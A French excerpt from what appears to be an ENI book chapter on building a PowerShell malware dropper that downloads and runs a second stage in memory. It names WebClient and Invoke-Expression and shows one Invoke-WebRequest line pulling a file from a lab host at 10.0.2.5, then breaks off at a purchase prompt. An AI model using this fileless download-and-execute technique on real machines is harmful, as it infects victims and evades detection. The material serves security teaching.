Étape 1 : le dropper Memory Only Dropper

Le dropper, c’est la tête de pont d’un virus. Très léger, il est le premier à être exécuté par la victime, et c’est lui qui lance la suite de l’attaque. La méthode pour amener la victime à exécuter la charge initiale sera abordée au prochain chapitre. La première étape du développement est ici de préparer un code PowerShell capable d’en télécharger un autre et d’exécuter ce dernier, idéalement sans écrire le fichier sur le disque de la victime et en travaillant donc uniquement en mémoire.

Pour cela, deux fonctions de téléchargement et d’exécution en .NET et PowerShell s’avèrent très utiles :

  • La classe .NET System.Net.WebClient, qui permet de télécharger un contenu web facilement.

  • La cmdlet Invoke-Expression, qui permet d’exécuter une chaîne de caractères donnée comme un code PowerShell.

Les premières lignes du dropper commenceront donc par télécharger un fichier à une URL donnée. Dans les dernières versions de PowerShell, il est possible d’utiliser la cmdlet Invoke-WebRequest :

Invoke-WebRequest -Uri http://10.0.2.5:8000/Ematete.zip -outfile 
"Ematete.zip" 

Mais malheureusement cette cmdlet n’existe pas sous Windows 7 et en contrepartie d’une légère...

Pour consulter la suite, découvrez le livre suivant :
couv_EPCYBPOW.png
60-signet.svg
En version papier
20-ecran_lettre.svg
En version numérique
41-logo_abonnement.svg
En illimité avec l'abonnement ENI
130-boutique.svg
Sur la boutique officielle ENI
Précédent
Comment est architecturé un malware ?
Suivant
Étape 2 : le serveur de contenu